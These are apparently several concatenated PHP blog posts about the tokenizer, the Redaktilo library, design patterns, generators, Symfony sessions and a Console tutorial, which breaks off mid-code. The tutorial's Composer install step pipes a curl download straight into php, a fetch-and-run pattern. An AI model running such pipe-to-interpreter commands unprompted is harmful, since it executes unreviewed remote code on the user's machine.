Tokenizer provides you with token_get_all($source) which takes a string
containing PHP source code and makes an array of tokens and informations out of
it.
Here's an example:
<?php
$code =<<<'EOF'
<?php
/**
* @param string $content
*/
function strlen($content)
{
for ($length = 0; isset($content[$length]); $length++);
return $length;
}
EOF;
$tokens = token_get_all($code);
Should produce:
$tokens = array(
// Either a string or an array with 3 elements:
// 0: code, 1: value, 2: line number
// Line 1
array(T_OPEN_TAG, "<?php\n", 1),
// Line 2
array(T_WHITESPACE, "\n", 2),
// Lines 3, 4 and 5
array(T_DOC_COMMENT, "/**\n * @param string $content\n */", 3), // On many lines
array(T_WHITESPACE, "\n", 5),
// Line 6
array(T_FUNCTION, "function", 6),
array(T_WHITESPACE, " ", 6), // Empty lines and spaces are the same: whitespace
array(T_STRING, "strlen", 6),
"(", // yep, no token nor line number...
array(T_VARIABLE, "$content", 6),
")",
array(T_WHITESPACE, "\n", 6),
"{",
// Line 7
array(T_WHITESPACE, "\n", 7),
// Line 8
array(T_FOR, "for", 8),
array(T_WHITESPACE, " ", 8),
"(",
array(T_VARIABLE, "$length", 8),
array(T_WHITESPACE, " ", 8),
"=",
array(T_WHITESPACE, " ", 8),
array(T_NUM, "0", 8),
";",
array(T_WHITESPACE, " ", 8),
array(T_ISSET, "isset", 8),
"(",
array(T_VARIABLE, "$content", 8),
"[",
array(T_VARIABLE, "$length", 8),
"]",
")",
";",
array(T_WHITESPACE, " ", 8),
array(T_VARIABLE, "$length", 8),
array(T_INC, "++", 8),
")",
";",
array(T_WHITESPACE, "\n\n", 8), // Double new line in one token
// Line 10
array(T_RETURN, "return", 10),
array(T_WHITESPACE, " ", 10),
array(T_VARIABLE, "$length", 10),
";",
array(T_WHITESPACE, "\n", 10),
"}",
);
As you can see some things might seem odd, but once you know it you can start
manipulating the tokens. You should rely only on constants because their value
might vary between versions (e.g. T_OPEN_TAG is 376 in 5.6 and 374 in
5.5).
If you want to display a readable representation of the token's constant values,
use token_name($token).
Here's some resources you might find interresting:
Since the announcement of Redaktilo on this blog, this silly library has jumped from 164 lines of code in v0.3 to 571 in v0.7.
In this article:
Thanks to WouterJ you can now:
$editor->remove($file);$editor->changeTo($file, $replacement);$editor->replaceWith($file, $regex, $callback);$editor->has($file, $pattern);I've updated to documentation to make the library easier to learn with:
Redaktilo has been created to fulfill actual needs. To make sure it keeps this promise, I've added executable examples using PHPUnit tests.
The major changes have been massive refactorings to allow the library to be extended:
As highlited by Clément Herreman, those refactorings have introduced a more complex construction schema. To make things easier, a static Dependency Injection Container has been created.
Sublime Text's go to anything feature is really awesome, which is why I'd like to implement something similar:
array_search)strpos)preg_grep)token_get_all)The two first ones are already available, so the other one still have to be implemented (the last one might be done by Loick Piera).
The methods allowing this throw exception when nothing is found. Adding a
relative check (hasBefore and hasAfter) might make things easier.
Moving relatively isn't always sufficient. To go to an absolute line number
you have to use directly File, maybe it would be nicer to add a new method
to Editor (jumpToFirst).
Finally, the editor should allow insertion, replacement and removal in any locations, not just on the current line.
Once these features added, more refactoring should take place: since the
creation of Redaktilo, Jean-François Simon
advised me to use the command and memento patterns, which would allow the
undo/redo feature.
While I now think that Command is indeed more suitable than ReplaceStrategy
for insertion, replacement and removal, I'm not sure the versioning feature
is actually needed... For now.
And that should bring us near an alpha version :) .
A lot of renaming should happen at this stage:
changeTo to replacereplaceWith to replaceAllNotSupportedException to NotFoundEsceptionAnd perhaps some other methods or class names.
Once the heavy renaming done, beta versions can begin, with a main focus on making every thing safer (argument checking, exception handling).
I'm still not fully sure of what Redaktilo v1.0 will look like. Mainly because I still haven't anwsered this by question (which have been in my mind since the begining):
Should Redaktilo handle different kinds of files?
Sometimes I think it should, which is why the project has seen:
The motives behind this is the JSON use case: you can currently edit JSON files, but it's tedious.
Let's take the composer.json example. What if you need to
add a script when:
scripts section yet?script yet?Another example would be the addition of a new element in an array: you currently have to manually a trailing comma to the previous entry...
Redaktilo fulfills 98% of my use cases (inserting new lines in a YAML configuration file, editing PHP files and replacing bits in a documentation file) and is now extensible.
Some search strategies will be added to make it similar to the Sublime Text's go to anything, and some refactoring are still necessary before an alpha version.
There's still some unresolved questions (JSON edition is the 2% use case left), but I'm sure they'll be answered during the development.
In the end Editor should have the following methods (no guaranty on the
names):
I'd like to thank the early contributors:
Any help is appreciated, whether it's some code review, typo fixing or code/documentation contribution. But the biggest help you could give me: provide me with some feedback on Redaktilo's usage :) .
If you have any questions, remarks, please feel free to open an issue and start a discussion here.
]]>Sometimes, you just want to hide low level complexity behind a unique interface which communicates a high level policy. The Facade design pattern is all about this.
In this article, we'll see a real world example with Redaktilo.
Redaktilo provides an object oriented way to manipulate files. For example you can open existing ones, or create new ones:
<?php
require_once __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\DependencyInjection\StaticContainer;
$filesystem = StaticContainer::makeFilesystem();
$filename = '/tmp/monthy.py';
if ($filesystem->exists($filename)) {
$file = $filesystem->open('/tmp/existing.txt');
} else {
$file = $filesystem->create('/tmp/new.txt');
}
// ...
The main interest in this library lies in manipulations you can do, for example jumping to a line and adding a new one under it:
<?php
// ...
$lineSearchStrategy = StaticContainer::makeLineSearchStrategy();
$lineReplaceStrategy = StaticContainer::makeLineReplaceStrategy();
$lineNumber = $lineSearchStrategy->findNext('if Knight.saysNi():');
$lineReplaceStrategy->insertAt($file, $lineNumber, ' print "Ni!"');
// ...
Finally, you need to actually save the changes (they were only done in memory until now) :
// ...
$filesystem->write($file);
The Filesystem and Search/Replace strategies are low level APIs and require a lot of boilerplate code to do every day tasks.
What if we provided a unique interface in front of those services? One that would be in a higher level, say a text editor metaphor for instance?
<?php
require_once __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\DependencyInjection\StaticContainer;
$editor = StaticContainer::makeEditor();
$filename = '/tmp/monthy.py';
$file = $editor->open($filename, true); // Force file creation.
$editor->jumpDownTo($file, 'if Knight.saysNi():');
$editor->addAfter($file, ' print "Ni!"');
$editor->save($file);
You don't need to take care of every service creation, and now you only have to learn a small set of methods. The text editor metaphor also provides you with a neat way to easily remember these methods!
Facades hide low level implementation by providing a unique high level API.
Here's another blog post about this pattern, by Mike Ebert.
I hope you found this article interesting, if you have any questions or feedback please feel free to do so on Twitter.
]]>This week I've read two articles, which just have been published, on the Open/Closed principle:
I'd like to add my small contribution to their explanation by providing a real world example: Redaktilo.
Let's say you have the following file:
Egg
Sausage
Bacon
Spam
Redaktilo provides an Editor class which allows you to jump to the line you
want, provided that you know exactly its content:
$editor->has($file, 'Bacon'); // true!
$editor->jumpDownTo($file, 'Bacon'); // Current line: Bacon
$editor->jumpUpTo($file, 'Sausage'); // Current line: Sausage
But what if you want to jump two lines under Sausage? You'd have to create
a new method:
$editor->moveDown($file, 2); // Current line: Spam
You have extended Editor by modifying it.
Having to fork a library to extend it doesn't feel natural. What does the Open/Closed principle say?
Software entities (classes, modules, functions, etc.) should be open for extension, but closed for modification.
Our Editor class is open to extension, but also to modification.
To fix this, we can transfer the responsibility of finding a pattern in the file
to a SearchStrategy:
<?php
namespace Gnugat\Redaktilo\Search;
use Gnugat\Redaktilo\File;
interface SearchStrategy
{
public function has(File $file, $pattern);
public function findNext(File $file, $pattern);
public function findPrevious(File $file, $pattern);
public function supports($pattern);
}
Here's some implementation ideas:
LineSearchStrategy: looking for the exact line in the fileLineNumberSearchStrategy: jumping to a line relatively to the current oneRegexpSearchStrategy: looking for a pattern in the file using regular expressionsPhpTokenSearchStrategy: parsing PHP tokensThe supports method tells you that LineSearchStrategy needs $pattern to be
a string, but that RegexpSearchStrategy needs an Expression value object.
The responsibility to find a SearchStrategy which supports the given pattern
should be delegated to SearchEngine:
<?php
namespace Gnugat\Redaktilo\Search;
class SearchEngine
{
private $searchStrategies = array();
public function registerStrategy(SearchStrategy $searchStrategy)
{
$this->searchStrategies[] = $searchStrategy;
}
public function resolve($pattern)
{
foreach ($this->searchStrategies as $searchStrategy) {
if ($searchStrategy->supports($pattern)) {
return $searchStrategy;
}
}
throw new PatternNotSupportedException($pattern);
}
}
You no longer need to fork Redaktilo to add new search related behavior, you can
now just create a new implementation of SearchStrategy, register it into
SearchEngine and then inject it into the Editor:
use Gnugat\Redaktilo\Editor;
use Gnugat\Redaktilo\Filesystem;
use Gnugat\Redaktilo\Search\SearchEngine;
use Gnugat\Redaktilo\Search\LineNumberSearchStrategy;
use Gnugat\Redaktilo\Search\LineSearchStrategy;
use Symfony\Component\Filesystem\Filesystem as SymfonyFilesystem;
$searchEngine = new SearchEngine();
$lineSearchStrategy = new LineSearchStrategy();
$searchEngine->registerStrategy($lineSearchStrategy);
$lineNumberSearchStrategy = new LineNumberSearchStrategy();
$searchEngine->registerStrategy($lineNumberSearchStrategy);
$symfonyFilesystem = new SymfonyFilesystem();
$filesystem = new Filesystem($symfonyFilesystem);
$editor = new Editor($filesystem, $searchEngine);
We just made Redaktilo open to extension (still) and closed to modifications, hooray!
Here's what Editor looked like after adding moveDown:
<?php
namespace Gnugat\Redaktilo;
class Editor
{
public function jumpDownTo(File $file, $pattern)
{
$lines = $file->readlines();
$filename = $file->getFilename();
$currentLineNumber = $file->getCurrentLineNumber() + 1;
$length = count($lines);
while ($currentLineNumber < $length) {
if ($lines[$currentLineNumber] === $pattern) {
$file->setCurrentLineNumber($currentLineNumber);
return;
}
$currentLineNumber++;
}
throw new \Exception("Couldn't find line $pattern in $filename");
}
public function jumpUpTo(File $file, $pattern)
{
$lines = $file->readlines();
$filename = $file->getFilename();
$currentLineNumber = $file->getCurrentLineNumber() - 1;
while (0 <= $currentLineNumber) {
if ($lines[$currentLineNumber] === $pattern) {
$file->setCurrentLineNumber($currentLineNumber);
return;
}
$currentLineNumber--;
}
throw new \Exception("Couldn't find line $pattern in $filename");
}
public function moveUp(File $file, $lines = 1)
{
$newLineNumber = $file->getCurrentLineNumber() - $lines;
if ($newLineNumber < 0) {
$newLineNumber = 0;
}
$file->setCurrentLineNumber($newLineNumber);
}
public function has(File $file, $pattern)
{
return $file->hasLine($pattern);
}
}
And now, here's what it looks like:
<?php
namespace Gnugat\Redaktilo;
use Gnugat\Redaktilo\Search\SearchEngine;
class Editor
{
private $searchEngine;
public function __construct(SearchEngine $searchEngine)
{
$this->searchEngine = $searchEngine;
}
public function jumpDownTo(File $file, $pattern)
{
$searchStrategy = $this->searchEngine->resolve($pattern);
$foundLineNumber = $searchStrategy->findNext($file, $pattern);
$file->setCurrentLineNumber($foundLineNumber);
}
public function jumpUpTo(File $file, $pattern)
{
$searchStrategy = $this->searchEngine->resolve($pattern);
$foundLineNumber = $searchStrategy->findPrevious($file, $pattern);
$file->setCurrentLineNumber($foundLineNumber);
}
public function has(File $file, $pattern)
{
$searchStrategy = $this->searchEngine->resolve($pattern);
return $searchStrategy->has($file, $pattern);
}
}
You should be able to add new features without modifying existing code.
I hope you found this article interesting, if you have any questions or feedback please feel free to do so on Twitter.
]]>I've been working on a silly library lately: Redaktilo (it means editor in esperanto).
Redaktilo has been created to fulfill actual needs. In this article we'll see what it is all about, and why it won't stay silly for long.
Incenteev\ParameterHandler is a good example: it updates a YAML configuration after each update of the dependencies using Composer.
It uses the Symfony2 Yaml component which converts a YAML string into a PHP array, and then converts it back. The problem with it is that it strips empty lines, custom formatting and comments...
Redaktilo only inserts a new line in the file, leaving it as it is.
The composer.json file is really usefull and can be almost completly edited
using the composer.phar CLI application.
Some part still need manual edition, like the script section. To automate this
you could use json_decode and json_encode, but similarly to the previous use
case you would lose empty lines and custom formatting...
Redaktilo aims at solving this problem, but isn't ready yet: inserting a line in JSON often means adding a comma at the end of the previous one.
To be fair this use case isn't limited to PHP source code: it can be useful for any plain text files (text, XML, java, python, anything).
GnugatWizardBundle automatically registers new bundles installed using Composer in your Symfony2 application.
To do so it uses
SensioGeneratorBundle's
KernelManipulator
to insert a line in the app/AppKernel.php. However this class registers bundles for every
environments, and doesn't take into account bundle which depend on the kernel.
If you take a look at the KernelManipulator source code you'll realise it has been a bit over engineered as it parses PHP tokens.
A new KernelManipulator could be written using Redaktilo as follow:
<?php
namespace Sensio\Bundle\GeneratorBundle\Manipulator;
use Gnugat\Redaktilo\Editor;
class KernelManipulator extends Manipulator
{
protected $editor;
protected $appKernelFilename;
public function __construct(Editor $editor, $appKernelFilename)
{
$this->editor = $editor;
$this->appKernelFilename = $appKernelFilename;
}
public function addBundle($bundle)
{
$file = $this->editor->open($this->appKernelFilename);
$newLine = sprintf(' new %s(),', $bundle);
$this->editor->jumpDownTo(' public function registerBundles()');
$this->editor->jumpDownTo(' $bundles = array(');
$this->editor->jumpDownTo(' );');
$this->editor->addBefore($file, $newLine);
$this->editor->save($file);
return true;
}
}
A great effort has been put to document the project, as you can see in the README.
Here's an overview!
You can install Redaktilo using Composer:
composer require "gnugat/redaktilo:~0.3@dev"
Then you need to create an instance of the Editor class:
<?php
require_once __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\Filesystem;
use Gnugat\Redaktilo\Editor;
use Symfony\Component\Filesystem\Filesystem as SymfonyFilesystem;
$symfonyFilesystem = new SymfonyFilesystem();
$filesystem = new Filesystem($symfonyFilesystem);
$editor = new Editor($filesystem);
Editor is completly stateless, which means you can use the same instance
everywhere in your scripts/applications/libraries.
Let's now have a look at the available classes and their responsibility.
The basic idea behind Redaktilo is to provide an object oriented way to represent files:
<?php
namespace Gnugat\Redaktilo;
class File
{
public function getFilename();
public function read();
public function write($newContent);
// ...
}
Once this domain model available, you can build services to manipulate it.
This is the first service available:
<?php
namespace Gnugat\Redaktilo;
class Filesystem
{
public function open($filename); // Cannot open new files
public function create($filename); // Cannot create existing files
public function exists($filename);
public function write(File $file);
}
It creates instances of File and write their content in the actual file.
Developers should only use the Editor class: it's a facade which provides the
text edition metaphor:
<?php
namespace Gnugat\Redaktilo;
class Editor
{
// Filesystem operations.
public function open($filename, $force = false);
public function save(File $file);
// Line insertion.
public function addBefore(File $file, $add);
public function addAfter(File $file, $add);
// Content navigation.
public function jumpDownTo(File $file, $line);
public function jumpUpTo(File $file, $line);
}
And that's it.It told you it was a small and simple library ;) . Now let's see what's planned for the next releases.
There's still some search logic left in Editor.
To remove it, a whole system will be put in place: SearchEngineCollection will
be called by Editor and will ask its SearchEngines if they support the
pattern.
This should allow many search strategies:
@)You could then have an extending point!
Some extra logic are also left in File, regarding the conversion of the
content into an array of lines.
ContentConverter could take a file, and convert its content into anything:
IndentedLineThis would allow new types of SearchEngine, and maybe the creation of
ContentEditor which would bear the single responsibility of inserting,
replacing or removing bits of it.
I'd like to hear about more use cases: what would you do with Redaktilo? What would you like to do with it?
You can open issues to start discussions, just make sure to provide a real life use case ;) .
Redaktilo provides an Object Oriented way to manipulate files, through the editor metaphor:
In PHP ~5.5, a function containing yield becomes an instance of the
Generator class, which acts
like an iterator.
Each yield occurence marks a position. Calling next will move from the
current yield to the next one.
Thanks to the send method, the Generator class acts also as a corroutine:
you can send the returned value of the yield occurence.
A Generator function cannot return a value.
class Generator
{
public function current(); // The yielded value.
public function key();
public function valid(); // Has the iterator been closed?
public function next(); // Resumes execution.
public function rewind();
public function send($value); // Sends the value to be returned by the current yield, and resumes execution.
public function throw(Exception $e); // Replaces the current yield with `throw $e;`
}
function direct_generator()
{
yield 1;
yield 'index' => 2;
}
$generator = direct_generator();
echo $generator->current(); // outputs 1
$generator->next();
echo $generator->current(); // outputs 2
echo $generator->key(); // outputs index
The foreach loop internally calls current, key, next and valid methods:
function xrange($start, $end)
{
$value = $start;
while ($value <= $end) {
yield $value;
$value++;
}
}
foreach(xrange(1, 2) as $value) {
echo $value; // outputs 1, then 2.
}
Calling the send method is like replacing the current yield with the given
value.
function holy_grail_countdown($number)
{
while (0 < $number) {
$reset = (yield $number);
$number = $reset ?: $number - 1;
}
}
$c = holy_grail_countdown(5);
foreach ($c as $number) {
echo "$number\n"; // outputs 5, then 2 and finally 1.
if (5 === $number) {
$c->send(3);
}
}
I've first encountered generators and couritines in Python a long time ago, but never really grasped its utility.
It's only recently that I've found some articles describing some usefull use cases, so I'm just going to share them with you:
Another helpful resource would be the PHP's RFC, which I find more explicative than the actual documentation.
Generators allow you to pause the execution of a function and resume back to where it stopped. Coroutines allow you to send a value while resuming back to it!
If you have any comments or questions, feel free to notify me on Twitter.
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
Last reviewed: 22/02/2016.
TL;DR: jump to the conclusion.
The Symfony HttpFoundation component
is a library which provides an Object Oriented implementation of the HTTP
protocol: it wraps PHP's variable superglobals ($_POST, $_GET, $_SERVER,
etc) inside objects (Request, Response, Session, etc).
The idea behind it: web applications should receive a Request and return a Response.
In this article, we'll focus on the Session management which solves many issues (for example the PHP session already started error nightmare).
This introduction will show you how to use it in a "non-symfony" project:
In almost any cases, you'll only deal with the following three methods of the
Session object:
<?php
namespace Symfony\Component\HttpFoundation\Session;
use Symfony\Component\HttpFoundation\Session\SessionBagInterface;
class Session implements SessionInterface, \IteratorAggregate, \Countable
{
public function registerBag(SessionBagInterface $bag);
public function start();
public function getBag($name);
}
A Bag is a group of attributes stored in the session. Again, in most cases
you'll only deal with the following four methods of the AttributeBag object:
<?php
namespace Symfony\Component\HttpFoundation\Session\Attribute;
class AttributeBag implements AttributeBagInterface, \IteratorAggregate, \Countable
{
public function __construct($storageKey = '_sf2_attributes');
public function setName($name);
public function get($name, $default = null);
public function set($name, $value);
}
When using the sessions, you'll generally need to bootstrap things up as follows:
<?php
$session = new Session();
$myAttributeBag = new AttributeBag('my_storage_key');
$myAttributeBag->setName('some_descriptive_name');
$session->registerBag($myAttributeBag);
$session->start();
The session MUST be started by Symfony, and it SHOULD be started after the bag registrations.
Here's some code samples to make things clear.
Let's assume that our session looks like this:
<?php
$_SESSION = array(
'user' => array(
'first_name' => 'Arthur',
'last_name' => 'Dent',
),
);
Here's the bootstrap code we need:
<?php
$session = new Session();
$userAttributeBag = new AttributeBag('user');
$session->registerBag($userAttributeBag);
$session->start();
The equivalent to:
<?php
$firstName = 'Ford';
if (isset($_SESSION['user']['first_name'])) {
$firstName = $_SESSION['user']['first_name'];
}
$_SESSION['user']['last_name'] = 'Prefect';
Would be:
<?php
$userAttributeBag = $session->getBag('user');
$firstName = $userAttributeBag->get('first_name', 'Ford');
$userAttributeBag->set('last_name', 'Prefect');
Now, let's assume we have a session which has deep attributes:
<?php
$_SESSION = array(
'authentication' => array(
'tokens' => array(
'github' => 'A45E96F',
'twitter' => '11AEBC980D456E4EF',
),
),
);
Here's the bootstrap code we need:
<?php
$session = new Session();
$authenticationAttributeBag = new NamespacedAttributeBag('authentication');
$session->registerBag($authenticationAttributeBag);
$session->start();
The equivalent to:
<?php
$_SESSION['authentication']['tokens']['github'] = 'AEB558F02C3B346';
Would be:
<?php
$authenticationAttributeBag = $session->getBag($authenticationAttributeBag);
$authenticationAttributeBag->set('tokens/github', 'AEB558F02C3B346');
The Session has been designed to contain a group of attribute bags. But when
working with legacy sessions, you might have to access attributes which are
located at the root of the session. Here's how to extend the Session to allow
this.
A root attribute might look like:
<?php
$_SESSION = array(
'attribute' => 'value',
);
You need to create your own kind of Bag:
<?php
namespace Acme\Session;
use Symfony\Component\HttpFoundation\Session\SessionBagInterface;
class RootAttributeBag implements SessionBagInterface
{
private $name = 'single_attribute';
/** @var string */
private $storageKey;
/** @var mixed */
private $attribute;
public function __construct($storageKey)
{
$this->storageKey = $storageKey;
}
/** {@inheritdoc} */
public function getName()
{
return $this->name;
}
public function setName($name)
{
$this->name = $name;
}
/** {@inheritdoc} */
public function initialize(array &$array)
{
$attribute = !empty($array) ? $array[0] : null;
$this->attribute = &$attribute;
}
/** {@inheritdoc} */
public function getStorageKey()
{
return $this->storageKey;
}
/** {@inheritdoc} */
public function clear()
{
$this->attribute = null;
}
public function get()
{
return $this->attribute;
}
public function set($value)
{
$this->attribute = $value;
}
}
The storage key will be directly the attribute's key.
We also need to hack a Storage class which supports our Bag:
<?php
namespace Acme\Session;
use Symfony\Component\HttpFoundation\Session\Storage\NativeSessionStorage;
class LegacySessionStorage extends NativeSessionStorage
{
/** {@inheritdoc} */
protected function loadSession(array &$session = null)
{
if (null === $session) {
$session = &$_SESSION;
}
$bags = array_merge($this->bags, array($this->metadataBag));
foreach ($bags as $bag) {
$key = $bag->getStorageKey();
// We cast $_SESSION[$key] to an array, because of the SessionBagInterface::initialize() signature
$session[$key] = isset($session[$key]) ? (array) $session[$key] : array();
$bag->initialize($session[$key]);
}
$this->started = true;
$this->closed = false;
}
}
Finally, we'll need the following bootstrap code:
<?php
use Acme\Session\LegacySessionStorage;
use Acme\Session\RootAttributeBag;
use Symfony\Component\HttpFoundation\Session\Session;
$sessionStorage = new LegacySessionStorage();
$session = new Session($sessionStorage);
// before: $_SESSION['attribute']
$legacyBag = new RootAttributeBag('attribute');
$legacyBag->setName('legacy');
// after: $session->getBag('legacy')->get()
$session->registerBag($legacyBag);
The official documentation provides useful information about how the session use it. For example it explains how to manage flash messages.
It also explains how the session works behind the scene with useful tips on how to write the session in a database.
Some cookbooks are also available. You can find for instance one describing how to use session proxy which is useful if you want to encrypt the session data or to make it read only.
The common cases of problems encountered are due to the fact that the session was started before Symfony2 did.
To fix this, check in your php.ini that the session.auto_start option is set
to 0 (its default value).
If the session isn't auto started, it means that the application is starting the
session itself. If you cannot prevent this, use
PhpBridgeSessionStorage
with
NativeFileSessionHandler:
<?php
use Symfony\Component\HttpFoundation\Session\Session;
use Symfony\Component\HttpFoundation\Session\Storage\Handler\NativeFileSessionHandler;
use Symfony\Component\HttpFoundation\Session\Storage\PhpBridgeSessionStorage;
$sessionHandler = new NativeFileSessionHandler();
$sessionStorage = new PhpBridgeSessionStorage($sessionHandler);
$session = new Session($sessionStorage);
Another trouble you can encounter: you register some bags but they're always
empty, even though the $_SESSION contains the targeted values.
This would be because you register your bags after starting the session: if you
can't do otherwise then simply call $session->migrate() after your bag
registration, this will reload the values.
Finally when doing AJAX request you might notice slow performances, or non persistence of the data. This might be caused by a session locking mechanism which can be solved like this by saving manually the session:
<?php
$session->save();
// session_write_close(); // Only required before Symfony 2.1
By wrapping $_SESSION and session_*() functions, Session allows you to
make your code more testable
(you can mock it)
and to solve starting session issues (just make sure to be the first to start
it).
It's divided into AttributeBag which are arrays of parameters: this allows you
to organize your session by namespaces.
I hope you found some useful tips in this article, if you have any comments or questions don't be shy and drop me a line on Twitter.
]]>The Pomodoro Technique® helps you to manage your time in order to become more efficient with the following schema:
All you need is a pomodoro timer (I use tomate on Ubuntu), and a strong will to avoid distractions.
Breaks have been proven to improve productivity and mental well-being. By taking them regurarly, you should be fresh from monday morning to friday afternoon!
One of the points in the pomodoro technique is to avoid any disturbance. But when working in a team you cannot ignore your teamates for 25 minutes: what if they're stucked and need your help?
You can use it for any type of work. Just keep in mind that breaks should completly cut you off from your work: if you're a developer, then you should walk away from the computer (do some physical exercise, or have a non work related talk with your colleagues).
Have 4 work sessions of 25 minutes, interspersed by 3 break sessions of 5 minutes. Then have a 20 minutes break, and start again!
This will help you to stay focused the whole day while preventing burnout.
I hope you found this article interesting. If you have any comments or questions, don't be shy and drop me line on Twitter ;) .
]]>Deprecated: This article has been re-written - see The Ultimate Developer Guide to Symfony - Console
TL;DR: jump to the conclusion.
Symfony2 is a set of libraries which help you in your everyday tasks. You can even stack them together and create a framework with it:
Many frameworks already use a lot of components from Symfony2:
In this article, we'll see the Console Component, which allows you to build Command Line Interface (CLI) applications. Symfony 2.5 will be released in may 2014, with great new features for the Console, so I'll speak about this version here.
This component allows you to focus on one thing: creating commands. It takes care of all the coloring output, input gathering and command containing stuff.
The big picture is: you have an Application which contains a set of
Commands. When ran, the Application will create an Input object which
contains Options and Arguments provided by the user, and will feed it to
the right Command.
The code being the best documentation, we'll now see the strict minimum classes you should know, with the methods you'll likely use.
All you need to know about the Application is this:
<?php
namespace Symfony\Component\Console;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class Application
{
public function __construct($name = 'UNKNOWN', $version = 'UNKNOWN');
public function add(Command $command);
public function setDefaultCommand($commandName); // New in 2.5!
public function run(InputInterface $input = null, OutputInterface $output = null);
}
Minimum usage:
#!/usr/bin/env php
<?php
use Symfony\Component\Console\Application;
$application = new Application();
$application->run();
By running this script, you should be able to see a colorful output which lists
the available commands (list is the default command, and a help is also
available).
The Command class is the controller of your CLI application:
<?php
namespace Symfony\Component\Console\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;
class Command
{
protected function configure();
protected function execute(InputInterface $input, OutputInterface $output);
protected function interact(InputInterface $input, OutputInterface $output);
// To be called in configure
public function setName($name);
public function addArgument($name, $mode = null, $description = '', $default = null);
public function addOption($name, $shortcut = null, $mode = null, $description = '', $default = null);
public function setDescription($description);
public function setHelp($help);
public function setAliases($aliases);
}
Basically you create a class which extends Command. You need to implement 2
methods:
configure: the configuration of the command's name, arguments, options, etcexecute: where you process the input, call your services and write to the
outputThe interact method is called before the execute one: it allows you to ask
questions to the user to set more input arguments and options.
Here's my stand on arguments and options modes:
InputArgument::REQUIRED)InputOption::VALUE_NONE)InputOption::VALUE_REQUIRED),
don't forget to provide a default oneThe container of the arguments and options given by the user:
<?php
namespace Symfony\Component\Console\Input;
interface InputInterface
{
public function getArgument($name);
public function getOption($name);
}
The Application validates a part of the input: it checks if the command
actually accepts the given arguments and options (is the value required? Does
the hello:world command have a --yell option? etc), but you still need to
validate the input against your business rules (the --number option should
be an integer, the name argument should be escaped to avoid SQL injection,
etc).
A convenient object which allows you to write on the console output:
<?php
namespace Symfony\Component\Console\Output;
abstract class Output implements OutputInterface
{
public function writeln($messages, $type = self::OUTPUT_NORMAL);
}
The writeln method allows you to write a new line (with a newline character at
the end). If the given message is an array, it will print each elements on a
new line.
The tags allow you to color some parts:
<info>foo</info>)<comment>foo</comment>)<question>foo</question>)<error>foo</error>)Another brand new class from the version 2.5:
<?php
namespace Symfony\Component\Console\Logger;
use Psr\Log\AbstractLogger;
use Symfony\Component\Console\Output\OutputInterface;
class ConsoleLogger extends AbstractLogger
{
public function __construct(
OutputInterface $output,
array $verbosityLevelMap = array(),
array $formatLevelMap = array()
);
public function log($level, $message, array $context = array());
}
As you can see, it uses the OutputInterface provided by the Application.
You should inject this logger into your services, this will allow them to write
messages on the standard output of the console while keeping them decoupled from
this component (so you can use these services in a web environment).
Oh, and the good news is: it colors the output and decides whether or not to
print it depending on the verbosity and level of log! An error message would
always be printed in red, an informative message would be printed in green if
you pass the -vv option.
Just like any other component, the Console can be used as a standalone library.
In this example, we'll create a tool which will create a LICENSE file, just
like fossil (the bootstraper of markdown files for your FOSS projetcs).
To begin, let's install the component using Composer:
$ curl -sS https://getcomposer.org/installer | php # Downloading composer
$ ./composer.phar require "symfony/console:~2.5@dev"
Then create an empty application:
#!/usr/bin/env php
<?php
// File: fossil
require __DIR__.'/vendor/autoload.php';
use Symfony\Component\Console\Application;
$application = new Application('Fossil', '2.0.0');
$application->run();
Our command has two arguments:
It can also take the path of the project as an option (we'll provide the current directory as default value).
Let's create it:
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class LicenseCommand extends Command
{
protected function configure()
{
$this->setName('license');
$this->setDescription('Bootstraps the license file of your project');
$this->addArgument('author', InputArgument::REQUIRED);
$this->addArgument('year', InputArgument::REQUIRED);
$this->addOption('path', 'p', InputOption::VALUE_REQUIRED, '', getcwd());
}
protected function execute(InputInterface $input, OutputInterface $output)
{
}
}
Our command doesn't do anything yet, but we can already register it in our application:
#!/usr/bin/env php
<?php
// File: fossil
require __DIR__.'/vendor/autoload.php';
use Symfony\Component\Console\Application;
use Gnugat\Fossil\LicenseCommand;
$command = new LicenseCommand();
$application = new Application('Fossil', '2.0.0');
$application->add($command);
$application->run();
In order for it to run, you'll need to register the namespace in the autoloader
by editing the composer.json file at the root of the project:
{
"require": {
"symfony/console": "~2.5@dev"
},
"autoload": {
"psr-4": { "": "src" }
}
}
Then you need to run ./composer.phar update to update the configuration.
In fossil, templates
are retrieved using the
Finder component, their
values are replaced using Twig and written using the
Filesystem component.
In order to keep this article short, we'll:
LICENSE template in the commandimplodeThis means that you have to install the new component:
$ ./composer.phar require "symfony/filesystem:~2.4"
And then you need to fill the execute method:
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
class LicenseCommand extends Command
{
// configure method...
protected function execute(InputInterface $input, OutputInterface $output)
{
$path = $input->getOption('path').'/LICENSE';
$license = implode(' ', array(
'Copyright (c)',
$input->getArgument('author'),
$input->getArgument('year'),
));
$filesystem = new Filesystem();
$filesystem->dumpFile($path, $license.PHP_EOL);
$output->writeln(sprintf('Created the file %s', $path));
}
}
Now running ./fossil license "Loïc Chardonnet" "2013-2014" -p="/tmp" will
output the message "Created the file /tmp/LICENSE", which should be what really
happened.
I'm not a big fan of putting logic in my commands, so generally I use services to do the actual job:
<?php
// File src/Gnugat/Fossil/DocumentationWriter.php
namespace Gnugat\Fossil;
use Symfony\Component\Filesystem\Filesystem;
use Psr\Log\LoggerInterface;
class DocumentationWriter
{
private $filesystem;
private $logger;
public function __construct(Filesystem $filesystem, LoggerInterface $logger)
{
$this->filesystem = $filesystem;
$this->logger = $logger;
}
public function write($path, $content)
{
